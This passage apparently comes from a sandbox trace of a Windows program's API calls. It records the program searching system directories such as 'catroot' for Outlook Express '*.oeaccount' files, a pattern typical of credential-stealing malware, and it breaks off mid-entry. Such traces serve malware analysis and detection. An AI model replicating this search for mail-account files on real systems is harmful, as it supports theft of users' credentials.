(in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0253.035] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0253.035] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0253.035] strcmp (_Str1="..", _Str2="..") returned 0 [0253.035] FindNextFileA (in: hFindFile=0x24e7a0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0253.035] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0253.035] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0253.035] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0253.035] FindNextFileA (in: hFindFile=0x24e7a0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0253.036] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0253.036] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0253.036] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0253.036] FindNextFileA (in: hFindFile=0x24e7a0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0253.036] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0253.036] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0253.036] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0253.036] FindNextFileA (in: hFindFile=0x24e7a0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0253.036] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0253.036] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0253.036] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0253.036] FindNextFileA (in: hFindFile=0x24e7a0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0253.036] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0253.036] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0253.036] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0253.036] FindNextFileA (in: hFindFile=0x24e7a0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0253.036] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0253.036] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0253.036] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0253.036] FindNextFileA (in: hFindFile=0x24e7a0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0 [0253.036] FindClose (in: hFindFile=0x24e7a0 | out: hFindFile=0x24e7a0) returned 1 [0253.037] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.037] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.037] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.037] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.037] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.037] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.037] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.037] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.037] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.037] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.037] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.037] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.037] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.037] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.037] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.037] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.037] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.037] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.037] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.038] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.038] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.038] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.038] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.038] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.038] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.038] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.038] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.038] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.038] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.038] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.038] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.039] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.039] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.039] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.039] strcmp (_Str1="Bthprops", _Str2="..") returned 1 [0253.039] strcmp (_Str1="Bthprops", _Str2=".") returned 1 [0253.039] _mbscpy (in: param_1=0x19e324, param_2=0x19e6ec | out: param_1=0x19e324) returned 0x19e324 [0253.039] _mbscat (in: param_1=0x19e324, param_2=0x414078 | out: param_1=0x19e324) returned 0x19e324 [0253.039] _mbscat (in: param_1=0x19e324, param_2=0x4154e8 | out: param_1=0x19e324) returned 0x19e324 [0253.039] FindFirstFileA (in: lpFileName="Bthprops\\*.oeaccount", lpFindFileData=0x19e468 | out: lpFindFileData=0x19e468) returned 0xffffffff [0253.094] _mbscpy (in: param_1=0x19e834, param_2=0x19ebfc | out: param_1=0x19e834) returned 0x19e834 [0253.094] _mbscat (in: param_1=0x19e834, param_2=0x414078 | out: param_1=0x19e834) returned 0x19e834 [0253.094] _mbscat (in: param_1=0x19e834, param_2=0x4147c4 | out: param_1=0x19e834) returned 0x19e834 [0253.094] FindFirstFileA (in: lpFileName="Bthprops\\*.*", lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0x24eae0 [0253.095] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0253.095] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0253.095] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0253.095] strcmp (_Str1=".", _Str2="..") returned -1 [0253.095] strcmp (_Str1=".", _Str2=".") returned 0 [0253.095] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0253.095] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0253.095] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0253.095] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0253.095] strcmp (_Str1="..", _Str2="..") returned 0 [0253.095] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0253.095] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0253.095] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0253.095] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0253.095] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0 [0253.095] FindClose (in: hFindFile=0x24eae0 | out: hFindFile=0x24eae0) returned 1 [0253.095] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.095] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.095] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.095] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.095] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.095] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.095] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.095] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.095] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.095] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.095] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.096] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.096] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.096] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.096] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.096] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.096] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.096] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.096] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.096] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.096] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.096] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.096] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.097] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.097] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.097] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.097] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.097] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.097] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.097] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.097] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.097] _mbscpy (in: param_1=0x19f4f0, param_2=0x19f634 | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.097] _mbscat (in: param_1=0x19f4f0, param_2=0x19f3dc | out: param_1=0x19f4f0) returned 0x19f4f0 [0253.097] strcmp (_Str1="catroot", _Str2="..") returned 1 [0253.097] strcmp (_Str1="catroot", _Str2=".") returned 1 [0253.097] _mbscpy (in: param_1=0x19e324, param_2=0x19e6ec | out: param_1=0x19e324) returned 0x19e324 [0253.097] _mbscat (in: param_1=0x19e324, param_2=0x414078 | out: param_1=0x19e324) returned 0x19e324 [0253.097] _mbscat (in: param_1=0x19e324, param_2=0x4154e8 | out: param_1=0x19e324) returned 0x19e324 [0253.097] FindFirstFileA (in: lpFileName="catroot\\*.oeaccount", lpFindFileData=0x19e468 | out: lpFindFileData=0x19e468) returned 0xffffffff [0253.097] _mbscpy (in: param_1=0x19e834, param_2=0x19ebfc | out: param_1=0x19e834) returned 0x19e834 [0253.097] _mbscat (in: param_1=0x19e834, param_2=0x414078 | out: param_1=0x19e834) returned 0x19e834 [0253.097] _mbscat (in: param_1=0x19e834, param_2=0x4147c4 | out: param_1=0x19e834) returned 0x19e834 [0253.097] FindFirstFileA (in: lpFileName="catroot\\*.*", lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0x24eae0 [0253.097] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0253.097] _mbscat (in: param_1=0x19eab8, param_2=0x414078 | out: param_1=0x19eab8) returned 0x19eab8 [0253.097] _mbscat (in: param_1=0x19eab8, param_2=0x19e9a4 | out: param_1=0x19eab8) returned 0x19eab8 [0253.098] strcmp (_Str1=".", _Str2="..") returned -1 [0253.098] strcmp (_Str1=".", _Str2=".") returned 0 [0253.098] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0253.098] _mbscpy (in: param_1=0x19eab8, param_2=0x19ebfc | out: param_1=0x19eab8) returned 0x19eab8 [0253.098] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 1 [0253.098] FindFirstFileA (in: lpFileName="catroot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\*.oeaccount", lpFindFileData=0x19da30 | out: lpFindFileData=0x19da30) returned 0xffffffff [0253.098] FindFirstFileA (in: lpFileName="catroot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\*.*", lpFindFileData=0x19df40 | out: lpFindFileData=0x19df40) returned 0x24eb20 [0253.098] FindNextFileA (in: hFindFile=0x24eb20, lpFindFileData=0x19df40 | out: lpFindFileData=0x19df40) returned 1 [0253.098] FindNextFileA (in: hFindFile=0x24eb20, lpFindFileData=0x19df40 | out: lpFindFileData=0x19df40) returned 0 [0253.098] FindClose (in: hFindFile=0x24eb20 | out: hFindFile=0x24eb20) returned 1 [0253.098] FindNextFileA (in: hFindFile=0x24eae0, lpFindFileData=0x19e978 | out: lpFindFileData=0x19e978) returned 0 [0253.098] FindClose (in: hFindFile=0x24eae0 | out: hFindFile=0x24eae0) returned 1 [0253.098] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.098] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.098] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.099] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.100] FindNextFileA (in: hFindFile=0x24e9e0, lpFindFileData=0x19f3b0 | out: lpFindFileData=0x19f3b0) returned 1 [0253.101] FindNextFileA (in: 